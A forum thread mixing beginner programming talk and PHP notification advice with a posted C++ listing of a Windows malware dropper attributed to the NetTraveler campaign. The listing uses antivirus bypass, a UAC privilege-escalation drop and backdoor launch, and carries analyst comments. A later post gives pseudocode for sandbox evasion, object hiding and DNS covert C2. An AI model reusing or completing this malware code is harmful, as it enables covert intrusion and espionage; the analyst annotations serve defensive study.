
Need help- How to start with open source C++ projects?

I recommend a startup company then.

Just curious, what do you make of this program?

Code:
#include <windows.h>
#include <iostream>

// Functions for AntiVirus bypass
#include "bypass.hpp"

// Plain installer
#include "installer.hpp"

// Local privileges elevators
#include "x32_elevator.hpp"
#include "x64_elevator.hpp"

// ======= [BEGIN EASY CUSTOMIZATION] =======
// Names of the two files WinMain writes into its current working directory.
// Analyst note: both are build-time constants that are meant to be changed,
// so treat them as weak indicators and key detection on the behaviour instead.
#define EXPLOIT_EXE_NAME    "temp.exe"
#define BACKDOOR_EXE_NAME    "net.exe"
// ======== [END EASY CUSTOMIZATION] ========

// C4996 is MSVC's deprecation warning; it is silenced because GetVersionEx() is deprecated.
#pragma warning(disable : 4996)            // Keep using GetVersionEx()

// Version gate that selects which branch WinMain takes.
//
// Returns TRUE when the reported major version is 6, and also TRUE when
// GetVersionEx() itself fails. Nothing here looks at patch level or UAC
// configuration, so "vulnerable" only means "the OS reports major version 6".
BOOL IsVulnerableOS()
{
    OSVERSIONINFO osvInfo;

    memset(&osvInfo, 0, sizeof(OSVERSIONINFO));
    // The API expects the caller to fill in the structure size before the call.
    osvInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);

    // http://msdn.microsoft.com/en-us/library/windows/desktop/ms724833(v=vs.85).aspx
    // Major version 6 covers Windows Vista through 8.1 (6.0 - 6.3) and the
    // matching server releases; this is an equality test, not "greater than Vista".
    // NOTE(review): GetVersionEx() reports a manifest-dependent version on
    // Windows 8.1 and later (6.2 for an unmanifested binary), so this test may
    // also pass there - confirm against the sample's manifest.
    if (GetVersionEx(&osvInfo))
        return osvInfo.dwMajorVersion == 6;

    // A failed version query is treated the same as a match.
    return TRUE;
}

// Report whether the processor architecture returned by the system-info
// query is x64; WinMain uses the answer to pick the 32- or 64-bit payload.
//
// Returns TRUE for PROCESSOR_ARCHITECTURE_AMD64, FALSE for anything else.
BOOL IsAMD64()
{
    __tGetNativeSystemInfo lpfnGetNativeSystemInfo;
    SYSTEM_INFO sysInfo;

    memset(&sysInfo, 0, sizeof(SYSTEM_INFO));

    // Macro defined outside this listing (presumably in bypass.hpp). The NULL
    // test below shows it leaves either a function pointer or NULL in
    // lpfnGetNativeSystemInfo. Presumably the API is resolved at run time so
    // that its name is missing from the import table; analysts should not
    // expect a static import of GetNativeSystemInfo in the binary - confirm.
    AV_BYPASS__GetNativeSystemInfo(lpfnGetNativeSystemInfo)

    // Fall back to GetSystemInfo() when the pointer could not be obtained.
    // In a 32-bit process on 64-bit Windows that call reports the emulated
    // x86 architecture, so the fallback would select the 32-bit payload.
    if(NULL != lpfnGetNativeSystemInfo)
        lpfnGetNativeSystemInfo(&sysInfo);
    else
        GetSystemInfo(&sysInfo);

    // This is outdated wProcessorArchitecture instead of dwOemId should be used
    // (dwOemId shares a union with wProcessorArchitecture in SYSTEM_INFO, so
    // the WORD cast reads the same field on little-endian Windows).
    if ((WORD)sysInfo.dwOemId == PROCESSOR_ARCHITECTURE_AMD64)
        return TRUE;

    return FALSE;
}

// Entry point of the dropper. Every path returns 0.
//
// Behaviour visible in this listing:
//   1. Reads 288 bytes at file offset 688 of its own image on disk and copies
//      them over the same offset of the embedded g_lpInstaller image, so the
//      dropped file carries the same configuration block as the dropper.
//   2. Writes g_lpInstaller to <cwd>\net.exe. When IsVulnerableOS() is TRUE it
//      also writes g_lpElevator32 or g_lpElevator64 to <cwd>\temp.exe with the
//      HIDDEN attribute set.
//   3. Launches temp.exe (elevation branch) or net.exe (plain branch) with the
//      "Open" verb through a ShellExecute pointer obtained via GetProcAddress().
//   4. Waits 20 seconds, deletes the files it dropped, and exits.
//
// Analyst notes:
//   - The file names are build-time constants; the stable signal is the
//     sequence "write PE into working directory -> ShellExecute it -> delete
//     about 20 s later", plus the HIDDEN attribute on the second file.
//   - The configuration block sits at offset 688, length 288, in both the
//     dropper and the dropped installer, which is where to look when
//     extracting configuration from a captured sample.
//   - g_lpInstaller, g_lpElevator32/64, __tShellExecute and the AV_BYPASS__*
//     macros come from headers that are not part of this listing.
int CALLBACK WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    // Receives the API name built by AV_BYPASS__ShellExecute; presumably
    // "ShellExecuteA" (13 characters plus terminator fits 14 bytes) - confirm.
    CHAR szShellExecute[14];

    CHAR szWorkFileName[MAX_PATH];
    CHAR szTempPath[MAX_PATH];
    CHAR szWorkDir[MAX_PATH];
    CHAR szNetPath[MAX_PATH];

    // Both drop paths are derived from the current working directory, not
    // from the directory the dropper itself lives in.
    GetCurrentDirectory(MAX_PATH, szWorkDir);
    sprintf(szTempPath, "%s\\" EXPLOIT_EXE_NAME, szWorkDir);

    // Open the dropper's own image on disk for reading.
    GetModuleFileName(NULL, szWorkFileName, MAX_PATH);
    FILE *f = fopen(szWorkFileName, "rb");

    if (NULL == f)
        return 0;

    // Copy the 288-byte configuration block from the dropper's own file
    // (offset 688) into the same offset of the embedded installer image.
    char lpBuf[288] = {};

    fseek(f, 688, 0);
    fread(lpBuf, 1, 288, f);

    memcpy(&g_lpInstaller[688], lpBuf, 288);

    HANDLE hNetHandle;
    __tShellExecute lpfnShellExecute;
    if (TRUE == IsVulnerableOS())
    {
        sprintf(szNetPath, "%s\\" BACKDOOR_EXE_NAME, szWorkDir);

        // Write the backdoor and wait for privileges escalation
        // (it is only written here; this branch launches temp.exe, so
        // presumably the elevator is what starts net.exe - confirm).
        hNetHandle = CreateFile(szNetPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
        if (INVALID_HANDLE_VALUE != hNetHandle)
        {
            DWORD dwTmp = 0;

            WriteFile(hNetHandle, g_lpInstaller, sizeof(g_lpInstaller), &dwTmp, 0); // Original size: 55808
            CloseHandle(hNetHandle);
        }

        // Write exploit to attempt local privileges escalation
        // (See http://www.pretentiousname.com/misc/win7_uac_whitelist2.html for more info)
        // Defender note: going by the URL, the referenced issue is the
        // Windows 7 UAC auto-elevation whitelist; running as a standard user
        // or with UAC at "Always notify" is the usual mitigation for that
        // class - verify against the actual elevator payload, not shown here.
        // This is the only dropped file created with FILE_ATTRIBUTE_HIDDEN.
        HANDLE hTempHandle = CreateFile(szTempPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL | FILE_ATTRIBUTE_HIDDEN, NULL);
        if (INVALID_HANDLE_VALUE != hTempHandle)
        {
            DWORD dwTempTmp = 0, dwSizeTemp;
            const unsigned char *lpBufTemp;

            // Pick the embedded payload that matches the reported architecture.
            if (TRUE == IsAMD64())
            {
                dwSizeTemp    = sizeof(g_lpElevator64); // Original size: 88576
                lpBufTemp    = g_lpElevator64;
            }
            else
            {
                dwSizeTemp    = sizeof(g_lpElevator32); // Original size: 81920
                lpBufTemp    = g_lpElevator32;
            }

            WriteFile(hTempHandle, lpBufTemp, dwSizeTemp, &dwTempTmp, 0);
            CloseHandle(hTempHandle);
        }

        Sleep(200);

        // Macro from outside this listing fills szShellExecute; the API is
        // then looked up by name at run time, so a static import of
        // ShellExecute is not to be expected in the binary.
        AV_BYPASS__ShellExecute(szShellExecute)
        lpfnShellExecute = (__tShellExecute)GetProcAddress(LoadLibrary("Shell32.dll"), szShellExecute);

        // Launch temp.exe. ShellExecute reports failure with small non-zero
        // codes (<= 32), so this NULL test also passes on most failures and
        // the delete path below runs whether or not the launch worked.
        if (NULL != lpfnShellExecute(NULL, "Open", szTempPath, NULL, NULL, SW_SHOWNORMAL))
        {
            Sleep(20000);

            // Both dropped files are removed about 20 s after the launch
            // attempt, so they are short-lived on disk.
            DeleteFile(szTempPath);
            DeleteFile(szNetPath);

            return 0;
        }
    }
    else
    {
        sprintf(szNetPath, "%s\\" BACKDOOR_EXE_NAME, szWorkDir);

        // Write the backdoor and skip privileges escalation
        hNetHandle = CreateFile(szNetPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
        if (INVALID_HANDLE_VALUE != hNetHandle)
        {
            DWORD dwTmp_ = 0;

            WriteFile(hNetHandle, g_lpInstaller, sizeof(g_lpInstaller), &dwTmp_, 0); // Original size: 55808
            CloseHandle(hNetHandle);
        }

        Sleep(200);

        // Same run-time lookup of ShellExecute as in the other branch.
        AV_BYPASS__ShellExecute(szShellExecute)
        lpfnShellExecute = (__tShellExecute)GetProcAddress(LoadLibrary("Shell32.dll"), szShellExecute);

        // Execute the backdoor without escalating privileges
        if (lpfnShellExecute(NULL, "Open", szNetPath, NULL, NULL, SW_SHOWNORMAL))
        {
            // Macro from outside this listing; going by its name and argument
            // it is the 20-second wait that the other branch does with a
            // plain Sleep(20000) - confirm against bypass.hpp.
            AV_BYPASS__Sleep(20000)

            // net.exe is deleted after the wait; presumably the installer has
            // relocated itself by then - confirm with dynamic analysis.
            DeleteFile(szNetPath);
            return 0;
        }
    }

    return 0;
}
I just saw your edited post. I can't figure much out, but you are trying to install something bypassing the antivirus. What is it actually?
 
I just saw your edited post.I cant figure much out but you are trying to install something bypassing the antivirus.What is it actually?

A project associated to C++ I am working on.

It's code from a module of malware used by Chinese hackers in a cyber espionage campaign against Indian Govt/ Research/ Financial institutions

Kaspersky Lab Uncovers ‘Operation NetTraveler,’ a Global Cyberespionage Campaign Targeting Government-Affiliated Organizations and Research Institutes
 
I'm PHP developer, recently working in Laravel which is PHP's latest framework. Running my own little company in Lahore, we work primarily on web development.
Yaar now you have mentioned PHP :D can i get some help? a website is involved in my FYP which is based on Telemedicine ...its a CMS......i just want to notify a person whenever he gets message from doctor/patient or his data gets updated through wearable sensors...in short can you guide me how to notify? and the other thing is how to send message from one user account to other?
 
@A$HU i remember once my friend was working on a project to remove bugs from notepad++ , it was open source and based on c++ if i am not wrong , just check it out.
 
Yaar now you have mentioned PHP :D can i get some help? a website is involved in my FYP which is based on Telemedicine ...its a CMS......i just want to notify a person whenever he gets message from doctor/patient or his data gets updated through wearable sensors...in short can you guide me how to notify? and the other thing is how to send message from one user account to other?


Have you developed this CMS? Did you use any open source CMS for this (wordpress, etc) or you have built it / are going to build it in PHP?

As far as the flow of this notification thing is concerned, there are many possible ways.

1) Via Sessions
2) Cookies
3) Database

You can store the notification details in session variables, and then use sessions to inform the doctor / patient. A session lasts only a short time. Alternatively, you can use cookies, which are stored on the client's system and contain the details. You can fetch the details from the cookies and then pass them to the doctor etc. The best way is to use a database, because of the security of your data: cookies sit on the client, where the user can read or change them, while database records stay on the server. Store the details in the database and then fetch the data from the DB and dispatch it to doctors etc.

If you don't want to keep track of these notifications for future use and just want to inform doctors / patients as soon as their data gets updated, then you can just ignore all 3 mentioned above, send data to doctor / patients at run time without storing it and discard data after its sent successfully.

All this is general idea. I don't know exact flow of your project so this is all I can tell for now.
 
Have you developed this CMS? Did you use any open source CMS for this (wordpress, etc) or you have built it / are going to build it in PHP?

As far as the flow of this notification thing is concerned, there are many possible ways.

1) Via Sessions
2) Cookies
3) Database

You can store the notification details in session variables, and then use sessions to inform doctor / patient. Session lasts for short time. Alternatively, you can use cookies which are stored at client's system and contains the details. You can fetch details from cookies and then pass them to doctor etc. The best way is to use database, because of security of your data. Store the details in database and then fetch data from DB and dispatch to doctors etc.

If you don't want to keep track of these notifications for future use and just want to inform doctors / patients as soon as their data gets updated, then you can just ignore all 3 mentioned above, send data to doctor / patients at run time without storing it and discard data after its sent successfully.

All this is general idea. I don't know exact flow of your project so this is all I can tell for now.

i din't clearly understand the requirements , but in php we usually to use session , whenever the user logs in use session and get the stored data .

or better for immediate notification we can use email , or mobile message APIs , i think we have those in PHP
 
i din't clearly understand the requirements , but in php we usually to use session , whenever the user logs in use session and get the stored data .

or better for immediate notification we can use email , or mobile message APIs , i think we have those in PHP


We have all that in PHP plus a lot more things. Like I said before, due to lack of knowledge on exact requirements of his project, I kept things to basics i.e. Sessions, Cookies or Database.
 
So what are you developing to counter this?

That particular espionage campaign is defunct

I am just trying to rewrite the malware code in the format below, which would allow researchers to test various approaches to countering it.

Code:
// Design sketch in pseudocode (numbered lines, "…" elisions); it is not
// compilable as written.
// NOTE(review): the identifiers are inconsistent - the stealth pointer is
// declared as pSthealth (type SteslthModule) but used as pStealth, and line 3
// calls init_CovetChannels() - so read the names as intent, not as a real API.
// For a test harness, each stage below corresponds to one detection area to
// exercise: environment checks, hiding of process/file/registry objects, and
// DNS-based command-and-control traffic.
// Initialize Modules
1: SteslthModule* pSthealth = init_StealthModule();
2: AntiForensicModule* pAntiForensic= init_AntiForensicModule();
3: CovertChannels* pCovertChannels = init_CovetChannels();
4: int main() {
…
// check whether the malware is running inside sandbox using
// all implemented methods
// (only VMware and VirtualBox checks are named here; the sample exits when
// either one fires, so an analysis VM may see no further behaviour)
5: If (pAntiForensic->detectSandbox(DETECT_VMWARE_ALL) ||
(pAntiForensic->detectSandbox(DETECT_VBOX_ALL))
5.1 terminateProcess(0);
…
// Set process, file and registry hiding using various methods
// (each setter selects one technique by constant; what PH_3,
// FH_FILTER_DRIVER_7 and RH_REGHOOK_1 stand for is not defined in this post)
6: pStealth->setProcessHideMethod(PH_3);
7: pStealth->setFilesHideMethod(FH_FILTER_DRIVER_7);
8: pStealth->setRegistryHideMethod(RH_REGHOOK_1);
…
// hidden channel to C&C server using DNS requests
// (the network-side test case: DNS monitoring is the control being exercised)
9: pCovertChannels->setMethod(CC_DNS_9);
10: pCovertChannels->sendMessage(buff, server_ip);
…
}
 
Have you developed this CMS? Did you use any open source CMS for this (wordpress, etc) or you have built it / are going to build it in PHP?

As far as the flow of this notification thing is concerned, there are many possible ways.

1) Via Sessions
2) Cookies
3) Database

You can store the notification details in session variables, and then use sessions to inform doctor / patient. Session lasts for short time. Alternatively, you can use cookies which are stored at client's system and contains the details. You can fetch details from cookies and then pass them to doctor etc. The best way is to use database, because of security of your data. Store the details in database and then fetch data from DB and dispatch to doctors etc.

If you don't want to keep track of these notifications for future use and just want to inform doctors / patients as soon as their data gets updated, then you can just ignore all 3 mentioned above, send data to doctor / patients at run time without storing it and discard data after its sent successfully.

All this is general idea. I don't know exact flow of your project so this is all I can tell for now.

Yes i have developed this and this is simple CMS...HTML/BOOTSTRAP for pages and designing and server side language is PHP.....I have completed it all...just these two things are remaining...!
now basic idea of my project is its a Telemedicine means Patient is in his home or some remote location and doctor is continuously monitoring him via web....I have to get sensor values from patient's body and after processing, transfer them to windows..this is all hardware's work..on software side i have a website and an android application...website will display all those sensor values....!
Now the thing is i have Doctor and Patient's accounts on website...I have a page which displays all the doctors... whenever patient clicks on any image of doctor,he gets registered to that doctor....Now Bro my requirement is upon getting a new patient doctor gets notified that he has a new patient XXXX...same as facebook whenever someone commented on any post we get a notification...This is the notification part...!

Second is just like two persons can chat on facebook with each other i want the same in my websit that doctor and patient can chat with each other...!
 
Yes i have developed this and this is simple CMS...HTML/BOOTSTRAP for pages and designing and server side language is PHP.....I have completed it all...just these two things are remaining...!
now basic idea of my project is its a Telemedicine means Patient is in his home or some remote location and doctor is continuously monitoring him via web....I have to get sensor values from patient's body and after processing, transfer them to windows..this is all hardware's work..on software side i have a website and an android application...website will display all those sensor values....!
Now the thing is i have Doctor and Patient's accounts on website...I have a page which displays all the doctors... whenever patient clicks on any image of doctor,he gets registered to that doctor....Now Bro my requirement is upon getting a new patient doctor gets notified that he has a new patient XXXX...same as facebook whenever someone commented on any post we get a notification...This is the notification part...!

Second is just like two persons can chat on facebook with each other i want the same in my websit that doctor and patient can chat with each other...!


its all a game of database , sessions and php mate , if you can take care of the sensors part i can easily do this notification thing for you.

when patient clicks on the doc pic redirect to a php script , before that create a table in phpmyadmin called patient_register with attributes

patient_ssn , doc_ssn , time_ofreg , flag(initially flag is set to 1)


ssn here is a unique identification variable given to users. When the doc logs in, put his ssn in a session variable, then search the patient_register table for rows whose doc_ssn matches it. If there is a match, check whether flag is set to 1; if yes, display the patient data using patient_ssn, with a message on his home page that this patient just registered with him, and set the flag to zero (meaning displayed). You can also display the date and time when he registered using time_ofreg (check the system date/time PHP function).

as far as chatting is concerned you get a chat messenger module , you can integrate it.
 
its all a game of database , sessions and php mate , if you can take care of the sensors part i can easily do this notification thing for you.

when patient clicks on the doc pic redirect to a php script , before that create a table in phpmyadmin called patient_register with attributes

patient_ssn , doc_ssn , time_ofreg , flag(initially flag is set to 1)


ssn here is a unique identification var given to users , doc logs in , get his ssn in a session variable , for his ssn search the patient_register table for matching doc_ssn , if does check flag if set to 1 , if yes then display the patient data using patient_ssn and a message that he just registered for you on his home page and set the flag to zero(means displayed) and you can also display the date , time when he registered using time_ofreg (check system date/time php fuction)

as far as chatting is concerned you get a chat messenger module , you can integrate it.
how can i display it on doc's page like a notification thingy? Do i have to use CSS again? i am not a software engineer and i dont know much about Designing...

@Zebra can you give me links of those messenger modules?
 
how can i display it on doc's page like a notification thingy? Do i have to use CSS again? i am not a software engineer and i dont know much about Designing...

look a simple approach would be give a notification button in home page where he goes after a log in , doc clicks the notif button , the button hyperlinks to a hyperlink.php file which gets all the info from database and displays it a table format in the notifications page of the website.

if you want to make it look attractive then you can turn the notification button red if there are any notifications for , the number of notifications all can be worked out but a bit more work.
 
look a simple approach would be give a notification button in home page where he goes after a log in , doc clicks the notif button , the button hyperlinks to a hyperlink.php file which gets all the info from database and displays it a table format in the notifications page of the website.

if you want to make it look attractive then you can turn the notification button red if there are any notifications for , the number of notifications all can be worked out but a bit more work.
yeah i think i already have a drop down class...Thanks for the help bro....i will tell you once i get it done :enjoy:
 
I'm PHP developer, recently working in Laravel which is PHP's latest framework. Running my own little company in Lahore, we work primarily on web development.

Is PHP better or Ruby on rails?
Which one would you suggest to someone starting new in Web development?
 
